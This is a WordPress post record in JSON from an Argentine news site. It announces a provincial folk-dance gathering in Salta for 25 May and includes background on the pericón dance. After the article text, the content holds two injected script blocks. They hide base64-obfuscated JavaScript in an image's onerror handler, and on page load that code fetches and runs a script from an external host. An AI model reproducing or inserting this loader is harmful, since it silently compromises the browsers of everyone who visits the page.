{"id":2655,"date":"2023-05-19T11:10:10","date_gmt":"2023-05-19T14:10:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2655"},"modified":"2025-08-14T00:16:33","modified_gmt":"2025-08-14T03:16:33","slug":"el-ballet-folkorico-de-la-provincia-presenta-al-son-del-25","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2655","title":{"rendered":"El Ballet Folk\u00f3rico de la Provincia presenta \u201cAl Son del 25&#8243;"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#035c90\"><em>Se trata del primer encuentro provincial de academias folkl\u00f3ricas y se realizar\u00e1 el jueves 25 de mayo a las 19:30 hs., en el Teatro Provincial (Zuvir\u00eda 70).<\/em><\/h3>\n\n\n\n<p>El objetivo es realizar un evento art\u00edstico social, donde se montar\u00e1 un espect\u00e1culo apto para todo p\u00fablico, a fin de conmemorar el 25 de mayo de 1810.<\/p>\n\n\n\n<p>Durante el encuentro se destacar\u00e1 la realizaci\u00f3n de varios cuadros folkl\u00f3ricos a cargo de diferentes academias de danza folkl\u00f3rica de nuestra provincia, y para cerrar, el Ballet Provincial invitar\u00e1 a cuatro parejas de cada academia a bailar \u201cEl gran peric\u00f3n\u201d.<\/p>\n\n\n\n<p>A lo largo de esta presentaci\u00f3n uno de los bailarines del ballet tendr\u00e1 como tarea asistir a una academia&nbsp; y marcar\u00e1 la coreograf\u00eda general para luego poder llevarla a escena conjuntamente con el Ballet Folkl\u00f3rico.<\/p>\n\n\n\n<p>El cierre consistir\u00e1 en \u201cEl gran peric\u00f3n\u201d ejecutado por parejas de las academias de danza y el ballet, aludiendo a c\u00f3mo se bailaba en \u00e9pocas pasadas este tipo de danzas.<\/p>\n\n\n\n<p>Para agregar, ser\u00eda enriquecedor instalar esta actividad como costumbre en los salte\u00f1os y poder realizarla a\u00f1o tras a\u00f1o, con diferentes agrupaciones art\u00edsticas y propuestas esc\u00e9nicas.<\/p>\n\n\n\n<p><strong>Sobre el peric\u00f3n<\/strong><\/p>\n\n\n\n<p>El peric\u00f3n es una danza folcl\u00f3rica en Uruguay, Argentina, Chile y Paraguay, principalmente en este \u00faltimo pa\u00eds. Esta danza consiste en un conjunto de parejas sueltas e interdependientes.<\/p>\n\n\n\n<p>El peric\u00f3n, junto al cielito y la media ca\u00f1a, forman un grupo de danzas evolucionadas en Uruguay y Argentina a partir de la contradanza europea. Son frecuentemente mencionados de forma conjunta en documentos fechados en las primeras d\u00e9cadas del siglo XIX. Algunas veces sus nombres se asociaban, como en \u00abcielito apericonado\u00bb o \u00abperic\u00f3n de media ca\u00f1a\u00bb, un hecho que ha llevado a algunos estudiosos a creer que tienen un origen en com\u00fan. Desde el punto de vista de su coreograf\u00eda, las tres danzas son contradanzas o cuadrillas, o sea que las parejas coordinan sus movimientos para realizar diversas figuras. Tanto el cielito como el peric\u00f3n eran muy populares durante la primera mitad del siglo XIX; luego de caer en desuso en parte de la segunda mitad, fueron recuperados por el circo y los movimientos tradicionalistas hacia el final del siglo.<\/p>\n\n\n\n<p>La entrada es libre y gratuita, sin invitaci\u00f3n y por orden de llegada.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata del primer encuentro provincial de academias folkl\u00f3ricas y se realizar\u00e1 el jueves 25 de mayo a las 19:30 hs., en el Teatro Provincial (Zuvir\u00eda 70). El objetivo es realizar un evento art\u00edstico social, donde se montar\u00e1 un espect\u00e1culo apto para todo p\u00fablico, a fin de conmemorar el 25 de mayo de 1810. Durante [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2656,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-2655","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2655"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2655"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2655\/revisions"}],"predecessor-version":[{"id":7079,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2655\/revisions\/7079"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2656"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2655"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2655"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2655"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}